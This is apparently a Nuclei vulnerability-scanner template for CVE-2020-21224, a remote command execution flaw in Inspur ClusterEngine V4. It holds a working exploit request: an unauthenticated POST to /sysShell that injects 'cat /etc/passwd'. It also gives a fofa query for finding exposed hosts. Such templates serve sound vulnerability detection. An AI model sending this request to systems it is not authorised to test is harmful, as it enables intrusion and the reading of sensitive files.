id: inspur-clusterengine-rce

info:
  name: Inspur Clusterengine V4 SYSshell - Remote Command Execution
  author: ritikchaddha
  severity: critical
  description: Inspur Clusterengine V4 SYSshell was found and allows remote command execution by design.
  reference:
    - https://www.inspursystems.com/
    - https://github.com/MzzdToT/ClusterEngineV4.0sysShell_rce
    - https://nvd.nist.gov/vuln/detail/CVE-2020-21224
    - https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-21224
    cwe-id: CWE-88
  metadata:
    fofa-query: title="TSCEV4.0"
  tags: inspur,clusterengine,rce

requests:
  - raw:
      - |
        POST /sysShell HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
        Cookie: lang=cn

        op=doPlease&node=cu01&command=cat+/etc/passwd

    redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# Enhanced by cs 03/27/2023
